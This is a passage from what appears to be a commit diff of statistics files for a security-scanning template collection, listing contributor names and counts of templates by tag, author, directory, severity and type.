sarp","count":1},{"name":"shiar","count":1},{"name":"th3.d1p4k","count":1},{"name":"xeldax","count":1},{"name":"official_blackhat13","count":1},{"name":"noamrathaus","count":1},{"name":"b0yd","count":1},{"name":"rotemreiss","count":1},{"name":"ok_bye_now","count":1},{"name":"opencirt","count":1},{"name":"8authur","count":1},{"name":"revblock","count":1},{"name":"piyushchhiroliya","count":1},{"name":"mah3sec_","count":1},{"name":"h4kux","count":1},{"name":"regala_","count":1},{"name":"danfaizer","count":1},{"name":"aresx","count":1},{"name":"adilsoybali","count":1},{"name":"makyotox","count":1},{"name":"push4d","count":1},{"name":"smaranchand","count":1},{"name":"yashanand155","count":1},{"name":"professorabhay","count":1},{"name":"d0rkerdevil","count":1},{"name":"chesterblue","count":1},{"name":"dk999","count":1},{"name":"yavolo","count":1},{"name":"null_hypothesis","count":1},{"name":"amir-h-fallahi","count":1},{"name":"0xkayala","count":1},{"name":"kareemse1im","count":1},{"name":"cbadke","count":1},{"name":"mrcl0wnlab","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"axrk","count":1},{"name":"fmunozs","count":1},{"name":"notwhy","count":1},{"name":"unp4ck","count":1},{"name":"chron0x","count":1},{"name":"davidfegyver","count":1},{"name":"marcos_iaf","count":1},{"name":"fopina","count":1},{"name":"_darrenmartyn","count":1},{"name":"juicypotato1","count":1},{"name":"hateshape","count":1},{"name":"sdcampbell","count":1},{"name":"phyr3wall","count":1},{"name":"w0tx","count":1},{"name":"zeyad azima","count":1},{"name":"adrianmf","count":1},{"name":"alperenkesk","count":1},{"name":"adamparsons","count":1},{"name":"miguelsegoviagil","count":1},{"name":"higor melgaço","count":1},{"name":"adnanekhan","count":1},{"name":"elder tao","count":1},{"name":"realexp3rt","count":1},{"name":"luciannitescu","count":1},{"name":"erethon","count":1},{"name":"stupidfish","count":1},{"name":"vulnspace","count":1},{"name":"hyunsoo-ds","count":1},{"name":"chetgan","count":1},{"name":"zn9988","count":1},{"name":"win3zz","count":1},{"name":"0ut0fb4nd","count":1},{"name":"f1she3","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"aayush vishnoi","count":1},{"name":"tim_koopmans","count":1},{"name":"kchason","count":1},{"name":"ky9oss","count":1},{"name":"charanrayudu","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kiks7","count":1},{"name":"denandz","count":1},{"name":"0xprial","count":1},{"name":"philippdelteil","count":1},{"name":"momen eldawakhly","count":1},{"name":"evolutionsec","count":1},{"name":"skylark-lab","count":1},{"name":"harryha","count":1},{"name":"ahmed sherif","count":1},{"name":"ruppde","count":1},{"name":"pepitoh","count":1},{"name":"brabbit10","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"diablo","count":1},{"name":"s1r1u5_","count":1},{"name":"lady_bug","count":1},{"name":"notsoevilweasel","count":1},{"name":"ritesh_gohil(#l4stpl4y3r)","count":1},{"name":"patralos","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"r3nz0","count":1},{"name":"sorrowx3","count":1},{"name":"imhunterand","count":1},{"name":"mbmy","count":1},{"name":"yashgoti","count":1},{"name":"ap3r","count":1},{"name":"juliosmelo","count":1},{"name":"booboohq","count":1},{"name":"amnotacat","count":1},{"name":"unknown","count":1},{"name":"viondexd","count":1},{"name":"ptonewreckin","count":1},{"name":"andirrahmani1","count":1},{"name":"dorkerdevil","count":1},{"name":"mubassirpatel","count":1},{"name":"bjxsec","count":1},{"name":"mayankpandey01","count":1},{"name":"sshell","count":1},{"name":"xstp","count":1},{"name":"apple","count":1},{"name":"wabafet","count":1},{"name":"marcio mendes","count":1},{"name":"pudsec","count":1},{"name":"shivanshkhari","count":1},{"name":"udinchan","count":1},{"name":"jeya.seelan","count":1},{"name":"shifacyclewla","count":1},{"name":"0xh7ml","count":1},{"name":"erikowen","count":1},{"name":"5up3r541y4n","count":1},{"name":"daviey","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"arjunchandarana","count":1},{"name":"wlayzz","count":1},{"name":"lethargynavigator","count":1},{"name":"husain","count":1},{"name":"olewagner","count":1},{"name":"borna nematzadeh","count":1},{"name":"kailashbohara","count":1},{"name":"f0xy","count":1},{"name":"lixts","count":1},{"name":"kabirsuda","count":1},{"name":"y0no","count":1},{"name":"x6263","count":1},{"name":"djoevanka","count":1},{"name":"evan rubinstien","count":1},{"name":"ramkrishna sawant","count":1},{"name":"esonhugh","count":1},{"name":"sickwell","count":1},{"name":"jbaines-r7","count":1},{"name":"ipanda","count":1},{"name":"0xd0ff9","count":1},{"name":"galoget","count":1},{"name":"dabla","count":1},{"name":"therealtoastycat","count":1},{"name":"invisiblethreat","count":1},{"name":"intx0x80","count":1},{"name":"rschio","count":1},{"name":"ynnirc","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"_c0wb0y_","count":1},{"name":"luqmaan hadia","count":1},{"name":"deena","count":1},{"name":"rumble773","count":1},{"name":"gboddin","count":1},{"name":"affix","count":1},{"name":"unkl4b","count":1},{"name":"compr00t","count":1},{"name":"exploitation","count":1},{"name":"akash.c","count":1},{"name":"yaser_s","count":1},{"name":"miryangjung","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"sec_hawk","count":1},{"name":"absshax","count":1},{"name":"r3s ost","count":1},{"name":"yusakie","count":1},{"name":"hanlaomo","count":1},{"name":"none","count":1},{"name":"jaskaran","count":1},{"name":"blckraven","count":1},{"name":"luskabol","count":1},{"name":"aaban solutions","count":1},{"name":"anon-artist","count":1},{"name":"alexrydzak","count":1},{"name":"bughuntersurya","count":1},{"name":"themiddle","count":1},{"name":"whynotke","count":1},{"name":"ringo","count":1},{"name":"patrick pirker","count":1},{"name":"bugvsme","count":1},{"name":"guax1","count":1},{"name":"m0ck3d","count":1},{"name":"watchtowr","count":1},{"name":"floriandewald","count":1},{"name":"ahmetpergamum","count":1},{"name":"ph33rr","count":1},{"name":"harshinsecurity","count":1},{"name":"carrot2","count":1},{"name":"thelicato","count":1},{"name":"dale clarke","count":1},{"name":"k3rwin","count":1},{"name":"rivalsec","count":1},{"name":"high","count":1},{"name":"izn0u","count":1},{"name":"babybash","count":1},{"name":"sttlr","count":1},{"name":"archer","count":1},{"name":"retr0","count":1},{"name":"lamscun","count":1},{"name":"fur1na","count":1},{"name":"nobody","count":1},{"name":"knassar702","count":1},{"name":"exceed","count":1},{"name":"aron molnar","count":1},{"name":"sicksec","count":1},{"name":"mammad_rahimzada","count":1},{"name":"banana69","count":1},{"name":"dievus","count":1},{"name":"kaizensecurity","count":1},{"name":"eremit4","count":1},{"name":"s1r1us","count":1},{"name":"petruknisme","count":1},{"name":"zsusac","count":1},{"name":"youngpope","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"naglis","count":1},{"name":"oscarintherocks","count":1},{"name":"godfatherorwa","count":1},{"name":"michal-mikolas","count":1},{"name":"anonymous","count":1},{"name":"omarjezi","count":1},{"name":"0xteles","count":1},{"name":"andysvints","count":1},{"name":"vinit989","count":1},{"name":"ndmalc","count":1},{"name":"orpheus","count":1},{"name":"act1on3","count":1},{"name":"irshadahamed","count":1},{"name":"jcockhren","count":1},{"name":"icarot","count":1},{"name":"tangxiaofeng7","count":1},{"name":"dawid-czarnecki","count":1},{"name":"domenicoveneziano","count":1},{"name":"1nf1n7y","count":1},{"name":"willd96","count":1},{"name":"geraldino2","count":1},{"name":"elitebaz","count":1},{"name":"sechunt3r","count":1},{"name":"elouhi","count":1},{"name":"brianlam38","count":1},{"name":"akshansh","count":1},{"name":"pwnwithlove","count":1},{"name":"j33n1k4","count":1},{"name":"jrolf","count":1},{"name":"mihhailsokolov","count":1},{"name":"allenwest24","count":1},{"name":"pphuahua","count":1},{"name":"ayadi","count":1},{"name":"af001","count":1},{"name":"aringo-bf","count":1},{"name":"sak1","count":1},{"name":"pratik khalane","count":1},{"name":"petergrifin","count":1},{"name":"houdinis","count":1},{"name":"hlop","count":1},{"name":"2rs3c","count":1},{"name":"noah @thesubtlety","count":1},{"name":"secthebit","count":1},{"name":"lingtren","count":1},{"name":"shelld3v","count":1},{"name":"b0rn2r00t","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"0h1in9e","count":1},{"name":"hotpot","count":1},{"name":"n0el4kls","count":1},{"name":"dhiyanesdk","count":1},{"name":"byobin","count":1},{"name":"gonski","count":1},{"name":"ola456","count":1},{"name":"prettyboyaaditya","count":1},{"name":"zinminphy0","count":1},{"name":"paper-pen","count":1},{"name":"caon","count":1},{"name":"mabdullah22","count":1},{"name":"mhdsamx","count":1},{"name":"tehtbl","count":1},{"name":"barthy.koeln","count":1},{"name":"colbyjack1134","count":1},{"name":"elmahdi","count":1},{"name":"spac3wh1te","count":1},{"name":"cravaterouge","count":1},{"name":"drfabiocastro","count":1},{"name":"carson chan","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"0xparth","count":1},{"name":"undefl0w","count":1},{"name":"aravind","count":1},{"name":"kiransau","count":1},{"name":"ohlinge","count":1},{"name":"p-l-","count":1},{"name":"hazana","count":1},{"name":"0xceeb","count":1},{"name":"hexcat","count":1},{"name":"wpsec","count":1},{"name":"matt miller","count":1},{"name":"michael wedl","count":1},{"name":"west-wise","count":1},{"name":"daffianfo","count":1},{"name":"furkansenan","count":1},{"name":"shivampand3y","count":1},{"name":"qianbenhyu","count":1},{"name":"arr0way","count":1},{"name":"numan türle","count":1},{"name":"liquidsec","count":1}],"directory":[{"name":"http","count":7546},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":134},{"name":"cloud","count":99},{"name":"code","count":81},{"name":"javascript","count":60},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":12},{"name":"cves.json","count":1},{"name":"TEMPLATES-STATS.json","count":1},{"name":"passive","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":3697},{"name":"high","count":1770},{"name":"medium","count":1528},{"name":"critical","count":1043},{"name":"low","count":265},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25},{"name":"http","count":2}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 2224519a71..2073fbad17 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5410 +1,5507 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | -| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | -| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | -| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | -| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | -| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 57 | | | | | -| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | -| edb | 599 | theamanrawat | 223 | headless | 11 | | | | | -| rce | 594 | r3y3r53 | 200 | contributors.json | 1 | | | | | -| packetstorm | 530 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| wpscan | 497 | gy741 | 158 | cves.json | 1 | | | | | -| cve2021 | 491 | rxerium | 142 | | | | | | | -| cve2022 | 476 | righettod | 141 | | | | | | | -| wp | 421 | sleepingbag945 | 132 | | | | | | | -| cve2023 | 374 | arafatansari | 118 | | | | | | | -| unauth | 366 | tess | 109 | | | | | | | -| sqli | 357 | pdresearch | 82 | | | | | | | -| file | 346 | iamnoooob | 69 | | | | | | | -| authenticated | 341 | idealphase | 66 | | | | | | | -| intrusive | 300 | madrobot | 65 | | | | | | | -| detect | 283 | zzeitlin | 64 | | | | | | | -| login | 276 | rootxharsh | 62 | | | | | | | -| kev | 268 | akincibor | 59 | | | | | | | -| cve2020 | 257 | for3stco1d | 55 | | | | | | | -| token-spray | 243 | philippedelteil | 53 | | | | | | | -| oast | 222 | gaurang | 42 | | | | | | | -| config | 221 | edoardottt | 42 | | | | | | | -| top-200 | 215 | johnk3r | 41 | | | | | | | -| default-login | 212 | c-sh0 | 35 | | | | | | | -| osint-social | 210 | j4vaovo | 35 | | | | | | | -| token | 193 | adam crosser | 31 | | | | | | | -| | 192 | luisfelipe146 | 31 | | | | | | | -| network | 192 | mastercho | 29 | | | | | | | -| apache | 189 | ice3man | 29 | | | | | | | -| devops | 176 | pwnhxl | 28 | | | | | | | -| cve2018 | 169 | organiccrap | 24 | | | | | | | -| iot | 166 | hardik-solanki | 24 | | | | | | | -| cve2019 | 165 | techbrunchfr | 23 | | | | | | | -| keys | 155 | harsh | 23 | | | | | | | -| joomla | 148 | ctflearner | 23 | | | | | | | -| malware | 142 | ffffffff0x | 22 | | | | | | | -| redirect | 135 | parthmalhotra | 20 | | | | | | | -| aws | 133 | cckuailong | 18 | | | | | | | -| cloud | 132 | kazgangap | 18 | | | | | | | -| auth-bypass | 131 | sullo | 18 | | | | | | | -| ssrf | 119 | bhutch | 17 | | | | | | | -| install | 118 | 0xpugazh | 16 | | | | | | | -| phishing | 117 | shaikhyaser | 16 | | | | | | | -| amazon | 116 | lu4nx | 16 | | | | | | | -| files | 113 | random-robbie | 16 | | | | | | | -| cve2010 | 112 | sheikhrishad | 15 | | | | | | | -| cms | 112 | pr3r00t | 15 | | | | | | | -| cve2017 | 110 | unapibageek | 15 | | | | | | | -| router | 108 | r3dg33k | 14 | | | | | | | -| top-100 | 100 | milo2012 | 14 | | | | | | | -| disclosure | 89 | tenbird | 14 | | | | | | | -| aws-cloud-config | 89 | dogasantos | 14 | | | | | | | -| linux | 83 | userdehghani | 14 | | | | | | | -| code | 81 | nullfuzz | 13 | | | | | | | -| local | 80 | theabhinavgaur | 13 | | | | | | | -| privesc | 79 | sharath | 13 | | | | | | | -| seclists | 79 | melbadry9 | 13 | | | | | | | -| takeover | 79 | 0ri2n | 13 | | | | | | | -| tokens | 78 | elsfa7110 | 13 | | | | | | | -| fileupload | 76 | meme-lord | 12 | | | | | | | -| oracle | 71 | suman_kar | 12 | | | | | | | -| cve2024 | 69 | kazet | 12 | | | | | | | -| oss | 67 | cyllective | 11 | | | | | | | -| cisco | 66 | wdahlenb | 11 | | | | | | | -| js | 63 | alph4byt3 | 10 | | | | | | | -| adobe | 62 | nadino | 10 | | | | | | | -| ir | 61 | 0x240x23elu | 10 | | | | | | | -| huntr | 59 | hackergautam | 10 | | | | | | | -| cve2015 | 59 | random_robbie | 10 | | | | | | | -| atlassian | 57 | logicalhunter | 10 | | | | | | | -| cve2016 | 57 | co5mos | 10 | | | | | | | -| enum | 56 | initstring | 9 | | | | | | | -| google | 56 | emadshanab | 9 | | | | | | | -| vmware | 56 | olearycrew | 9 | | | | | | | -| c2 | 55 | momika233 | 9 | | | | | | | -| logs | 48 | adamcrosser | 9 | | | | | | | -| tenable | 48 | oppsec | 9 | | | | | | | -| log4j | 47 | fabaff | 9 | | | | | | | -| hackerone | 46 | that_juan_ | 8 | | | | | | | -| vulhub | 46 | aashiq | 8 | | | | | | | -| aem | 45 | noraj | 8 | | | | | | | -| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | | -| php | 44 | veshraj | 8 | | | | | | | -| jndi | 44 | zh | 8 | | | | | | | -| cve2014 | 44 | irshad ahamed | 8 | | | | | | | -| debug | 44 | iamthefrogy | 8 | | | | | | | -| deserialization | 43 | divya_mudgal | 7 | | | | | | | -| osint-porn | 42 | leovalcante | 7 | | | | | | | -| traversal | 42 | nodauf | 7 | | | | | | | -| oa | 42 | caspergn | 7 | | | | | | | -| generic | 42 | me_dheeraj | 7 | | | | | | | -| | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| plugin | 42 | amit-jd | 7 | | | | | | | -| osint-hobby | 42 | huta0 | 7 | | | | | | | -| springboot | 41 | kophjager007 | 7 | | | | | | | -| cnvd | 40 | its0x08 | 7 | | | | | | | -| misc | 39 | techryptic (@tech) | 7 | | | | | | | -| microsoft | 38 | dr_set | 7 | | | | | | | -| injection | 38 | randomstr1ng | 7 | | | | | | | -| jira | 37 | tarunkoyalwar | 7 | | | | | | | -| listing | 37 | harshbothra_ | 7 | | | | | | | -| kubernetes | 37 | gitlab red team | 6 | | | | | | | -| ibm | 36 | evan rubinstein | 6 | | | | | | | -| cti | 36 | __fazal | 6 | | | | | | | -| osint-misc | 35 | clem9669 | 6 | | | | | | | -| sap | 34 | pathtaga | 6 | | | | | | | -| ssl | 33 | forgedhallpass | 6 | | | | | | | -| fuzz | 33 | megamansec | 6 | | | | | | | -| miscellaneous | 32 | pentest_swissky | 6 | | | | | | | -| osint-tech | 31 | hahwul | 6 | | | | | | | -| osint-coding | 30 | byt3bl33d3r | 6 | | | | | | | -| tls | 30 | imnightmaree | 6 | | | | | | | -| ec2 | 30 | puzzlepeaches | 6 | | | | | | | -| wp-theme | 30 | ja1sh | 6 | | | | | | | -| dlink | 30 | xelkomy | 6 | | | | | | | -| k8s | 28 | praetorian-thendrickson | 6 | | | | | | | -| api | 28 | devang-solanki | 6 | | | | | | | -| gitlab | 28 | justaacat | 6 | | | | | | | -| fortinet | 28 | kh4sh3i | 5 | | | | | | | -| bestwebsoft | 27 | andreluna | 5 | | | | | | | -| citrix | 27 | your3cho | 5 | | | | | | | -| proxy | 27 | r3naissance | 5 | | | | | | | -| firewall | 26 | defr0ggy | 5 | | | | | | | -| cve2012 | 26 | s0obi | 5 | | | | | | | -| lfr | 26 | joanbono | 5 | | | | | | | -| ssh | 25 | vicrack | 5 | | | | | | | -| weaver | 25 | panch0r3d | 5 | | | | | | | -| manageengine | 25 | r12w4n | 5 | | | | | | | -| zohocorp | 25 | gtrrnr | 5 | | | | | | | -| zoho | 24 | powerexploit | 5 | | | | | | | -| osint-shopping | 24 | shine | 5 | | | | | | | -| osint-finance | 24 | ganofins | 5 | | | | | | | -| dns | 24 | prajiteshsingh | 5 | | | | | | | -| osint-business | 24 | lucky0x0d | 5 | | | | | | | -| osint-images | 24 | mr-xn | 5 | | | | | | | -| admin | 23 | podalirius | 5 | | | | | | | -| audit | 23 | yanyun | 5 | | | | | | | -| stored-xss | 23 | robotshell | 5 | | | | | | | -| xxe | 23 | arm!tage | 5 | | | | | | | -| yonyou | 23 | pulsesecurity.co.nz | 4 | | | | | | | -| file-upload | 23 | m4lwhere | 4 | | | | | | | -| tomcat | 23 | heeress | 4 | | | | | | | -| s3 | 22 | tanq16 | 4 | | | | | | | -| cicd | 22 | shankar acharya | 4 | | | | | | | -| github | 22 | scent2d | 4 | | | | | | | -| prestashop | 22 | xxcdd | 4 | | | | | | | -| weblogic | 21 | dadevel | 4 | | | | | | | -| printer | 21 | wisnupramoedya | 4 | | | | | | | -| ecology | 21 | dolev farhi | 4 | | | | | | | -| dast | 21 | lum8rjack | 4 | | | | | | | -| msf | 21 | king-alexander | 4 | | | | | | | -| jenkins | 20 | iamnooob | 4 | | | | | | | -| camera | 20 | nybble04 | 4 | | | | | | | -| rukovoditel | 19 | jpg0mez | 4 | | | | | | | -| ftp | 19 | 0xr2r | 4 | | | | | | | -| struts | 19 | ggranjus | 4 | | | | | | | -| wavlink | 19 | e_schultze_ | 4 | | | | | | | -| hp | 19 | ice3man543 | 4 | | | | | | | -| grafana | 19 | k0pak4 | 4 | | | | | | | -| android | 18 | 3th1c_yuk1 | 4 | | | | | | | -| cve2011 | 18 | incogbyte | 4 | | | | | | | -| osint-music | 18 | h1ei1 | 4 | | | | | | | -| ruijie | 18 | cookiehanhoan | 4 | | | | | | | -| coldfusion | 18 | unstabl3 | 3 | | | | | | | -| vpn | 17 | splint3r7 | 3 | | | | | | | -| confluence | 17 | swissky | 3 | | | | | | | -| azure | 17 | z3bd | 3 | | | | | | | -| honeypot | 17 | skeltavik | 3 | | | | | | | -| nginx | 17 | flx | 3 | | | | | | | -| node.js | 17 | binaryfigments | 3 | | | | | | | -| service | 17 | true13 | 3 | | | | | | | -| mail | 17 | evergreencartoons | 3 | | | | | | | -| microweber | 16 | randomrobbie | 3 | | | | | | | -| cve2009 | 16 | emenalf | 3 | | | | | | | -| jarm | 16 | e1a | 3 | | | | | | | -| status | 16 | j3ssie | 3 | | | | | | | -| alibaba | 16 | jarijaas | 3 | | | | | | | -| backup | 16 | whoever | 3 | | | | | | | -| rconfig | 16 | sushantkamble | 3 | | | | | | | -| magento | 16 | cheesymoon | 3 | | | | | | | -| osint-blog | 16 | matt galligan | 3 | | | | | | | -| woocommerce | 15 | me9187 | 3 | | | | | | | -| cve2013 | 15 | _generic_human_ | 3 | | | | | | | -| ssti | 15 | johnjhacking | 3 | | | | | | | -| setup | 15 | salts | 3 | | | | | | | -| nodejs | 15 | badboycxcc | 3 | | | | | | | -| tongda | 15 | aringo | 3 | | | | | | | -| cnvd2021 | 15 | dr0pd34d | 3 | | | | | | | -| seeyon | 15 | fyoorer | 3 | | | | | | | -| bypass | 15 | andydoering | 3 | | | | | | | -| installer | 15 | farish | 3 | | | | | | | -| backdoor | 15 | ph33r | 3 | | | | | | | -| cve2008 | 15 | taielab | 3 | | | | | | | -| ruby | 15 | dudez | 3 | | | | | | | -| zyxel | 15 | c4sper0 | 3 | | | | | | | -| dashboard | 15 | fxploit | 3 | | | | | | | -| java | 15 | alifathi-h1 | 3 | | | | | | | -| moosocial | 15 | 0w4ys | 3 | | | | | | | -| headless | 14 | isacaya | 3 | | | | | | | -| creds-stuffing | 14 | imjust0 | 3 | | | | | | | -| docker | 14 | bernardofsr | 3 | | | | | | | -| windows | 14 | shifacyclewala | 3 | | | | | | | -| smb | 14 | yash anand @yashanand155 | 3 | | | | | | | -| login-check | 14 | xianke | 3 | | | | | | | -| npm | 14 | arcc | 3 | | | | | | | -| rds | 14 | atomiczsec | 3 | | | | | | | -| nagios | 14 | yuzhe-zhang-0 | 3 | | | | | | | -| redis | 14 | impramodsargar | 3 | | | | | | | -| jboss | 14 | f1tz | 3 | | | | | | | -| icewarp | 14 | huowuzhao | 3 | | | | | | | -| git | 14 | vsh00t | 3 | | | | | | | -| domainmod | 14 | lucasljm2001 | 3 | | | | | | | -| osint-art | 14 | ambassify | 3 | | | | | | | -| node | 14 | coldfish | 3 | | | | | | | -| redhat | 14 | parth | 3 | | | | | | | -| auth | 14 | ekrause | 3 | | | | | | | -| smtp | 14 | lark-lab | 3 | | | | | | | -| osint-health | 14 | mavericknerd | 3 | | | | | | | -| dell | 14 | canberbamber | 3 | | | | | | | -| osint-political | 13 | davidmckennirey | 3 | | | | | | | -| cuppa | 13 | thomas_from_offensity | 3 | | | | | | | -| osint-dating | 13 | vagnerd | 3 | | | | | | | -| graphql | 13 | bmcel | 2 | | | | | | | -| airflow | 13 | 0xsmiley | 2 | | | | | | | -| hashicorp | 13 | moritz nentwig | 2 | | | | | | | -| laravel | 13 | mrharshvardhan | 2 | | | | | | | -| sonicwall | 13 | ree4pwn | 2 | | | | | | | -| cuppacms | 13 | bp0lr | 2 | | | | | | | -| netgear | 13 | cocxanh | 2 | | | | | | | -| ivanti | 13 | paradessia | 2 | | | | | | | -| abstractapi | 13 | bing0o | 2 | | | | | | | -| postgresql | 13 | supr4s | 2 | | | | | | | -| rails | 13 | 0xsapra | 2 | | | | | | | -| fortigate | 13 | afaq | 2 | | | | | | | -| mysql | 13 | herry | 2 | | | | | | | -| vbulletin | 12 | thevillagehacker | 2 | | | | | | | -| kafka | 12 | shankaracharya | 2 | | | | | | | -| webserver | 12 | z0ne | 2 | | | | | | | -| doppler | 12 | w4cky_ | 2 | | | | | | | -| netsweeper | 12 | maximus decimus | 2 | | | | | | | -| zimbra | 12 | sinkettu | 2 | | | | | | | -| ofbiz | 12 | danmcinerney | 2 | | | | | | | -| newrelic | 12 | nuk3s3c | 2 | | | | | | | -| drupal | 12 | ehsahil | 2 | | | | | | | -| info-leak | 12 | kiblyn11 | 2 | | | | | | | -| cache | 11 | cckuakilong | 2 | | | | | | | -| iam | 11 | supras | 2 | | | | | | | -| iis | 11 | wa1tf0rme | 2 | | | | | | | -| spring | 11 | msegoviag | 2 | | | | | | | -| xstream | 11 | github.com/its0x08 | 2 | | | | | | | -| prometheus | 11 | thezakman | 2 | | | | | | | -| django | 11 | randomdhiraj | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | usdag | 2 | | | | | | | -| osint-video | 11 | streetofhackerr007 | 2 | | | | | | | -| fastjson | 11 | 0xnirvana | 2 | | | | | | | -| hikvision | 11 | michal mikolas (nanuqcz) | 2 | | | | | | | -| jolokia | 11 | martincodes-de | 2 | | | | | | | -| jetbrains | 11 | israel comazzetto dos reis | 2 | | | | | | | -| online-fire-reporting | 11 | christianpoeschl | 2 | | | | | | | -| phpmyadmin | 11 | redteambrasil | 2 | | | | | | | -| phpgurukul | 11 | mohammedsaneem | 2 | | | | | | | -| zabbix | 10 | amirhossein raeisi | 2 | | | | | | | -| elasticsearch | 10 | c3l3si4n | 2 | | | | | | | -| sitecore | 10 | ayadim | 2 | | | | | | | -| solr | 10 | socketz | 2 | | | | | | | -| dahua | 10 | bananabr | 2 | | | | | | | -| xstream_project | 10 | codexlynx | 2 | | | | | | | -| dropbox | 10 | charles d. | 2 | | | | | | | -| digitalocean | 10 | kishore-hariram | 2 | | | | | | | -| samsung | 10 | h0j3n | 2 | | | | | | | -| db | 10 | brucelsone | 2 | | | | | | | -| dedecms | 10 | ajaysenr | 2 | | | | | | | -| thinkphp | 10 | koti2 | 2 | | | | | | | -| solarview | 10 | korteke | 2 | | | | | | | -| symfony | 10 | gal nagli | 2 | | | | | | | -| glpi | 10 | davidegirardi | 2 | | | | | | | -| python | 9 | notnotnotveg | 2 | | | | | | | -| versa | 9 | x1m_martijn | 2 | | | | | | | -| firebase | 9 | pxmme1337 | 2 | | | | | | | -| crlf | 9 | paperpen | 2 | | | | | | | -| moodle | 9 | joshlarsen | 2 | | | | | | | -| exchange | 9 | nkxxkn | 2 | | | | | | | -| bitbucket | 9 | liwermor | 2 | | | | | | | -| cnvd2020 | 9 | t3l3machus | 2 | | | | | | | -| gitea | 9 | thardt-praetorian | 2 | | | | | | | -| sophos | 9 | lstatro | 2 | | | | | | | -| lucee | 9 | sbani | 2 | | | | | | | -| scada | 9 | hackerarpan | 2 | | | | | | | -| cloudtrail | 9 | gevakun | 2 | | | | | | | -| artica | 9 | florianmaak | 2 | | | | | | | -| secret | 9 | bsysop | 2 | | | | | | | -| kube | 9 | ep1csage | 2 | | | | | | | -| wso2 | 9 | parzival | 2 | | | | | | | -| facebook | 9 | lotusdll | 2 | | | | | | | -| elastic | 9 | clarkvoss | 2 | | | | | | | -| pfsense | 9 | d4vy | 2 | | | | | | | -| sangfor | 9 | v0idc0de | 2 | | | | | | | -| opencats | 9 | 0xelkomy | 2 | | | | | | | -| vcenter | 9 | egemenkochisarli | 2 | | | | | | | -| druid | 9 | 0xcrypto | 2 | | | | | | | -| blind | 9 | zomsop82 | 2 | | | | | | | -| progress | 9 | pbuff07 | 2 | | | | | | | -| config-audit | 8 | shelled | 2 | | | | | | | -| e-office | 8 | danielmofer | 2 | | | | | | | -| manager | 8 | 666asd | 2 | | | | | | | -| gateway | 8 | 8arthur | 2 | | | | | | | -| huawei | 8 | udit_thakkur | 2 | | | | | | | -| recon | 8 | convisoappsec | 2 | | | | | | | -| symantec | 8 | joeldeleep | 2 | | | | | | | -| microfocus | 8 | kre80r | 2 | | | | | | | -| phpjabbers | 8 | hetroublemakr | 2 | | | | | | | -| hms | 8 | sascha brendel | 2 | | | | | | | -| cloud-enum | 8 | 0xrudra | 2 | | | | | | | -| nexus | 8 | joshua rogers | 2 | | | | | | | -| ognl | 8 | amsda | 2 | | | | | | | -| wanhu | 8 | dheerajmadhukar | 2 | | | | | | | -| oauth | 8 | foulenzer | 2 | | | | | | | -| discord | 8 | dahse89 | 2 | | | | | | | -| mlflow | 8 | y4er | 2 | | | | | | | -| bucket | 8 | manas_harsh | 2 | | | | | | | -| metadata | 8 | brenocss | 2 | | | | | | | -| phpinfo | 8 | mzack9999 | 2 | | | | | | | -| mirai | 8 | rafaelwdornelas | 2 | | | | | | | -| cisco-switch | 8 | luci | 2 | | | | | | | -| spotweb | 8 | thabisocn | 2 | | | | | | | -| spotweb_project | 8 | geekby | 2 | | | | | | | -| console | 8 | arliya | 2 | | | | | | | -| error | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| emerge | 8 | nvn1729 | 2 | | | | | | | -| osint-news | 8 | n-thumann | 2 | | | | | | | -| default-page | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| go | 8 | g4l1t0 | 2 | | | | | | | -| unauthenticated | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| odoo | 8 | myztique | 2 | | | | | | | -| atom | 8 | 6mile | 2 | | | | | | | -| monstra | 7 | k11h-de | 2 | | | | | | | -| database | 7 | dbrwsky | 2 | | | | | | | -| avtech | 7 | zy9ard3 | 2 | | | | | | | -| mongodb | 7 | uomogrande | 2 | | | | | | | -| nagiosxi | 7 | serrapa | 2 | | | | | | | -| keking | 7 | dogancanbakir | 2 | | | | | | | -| telesquare | 7 | sy3omda | 2 | | | | | | | -| moodating | 7 | vavkamil | 2 | | | | | | | -| landray | 7 | raesene | 2 | | | | | | | -| joomla\! | 7 | borna nematzadeh | 1 | | | | | | | -| mobileiron | 7 | invisiblethreat | 1 | | | | | | | -| twitter | 7 | cravaterouge | 1 | | | | | | | -| openemr | 7 | lrtk-coder | 1 | | | | | | | 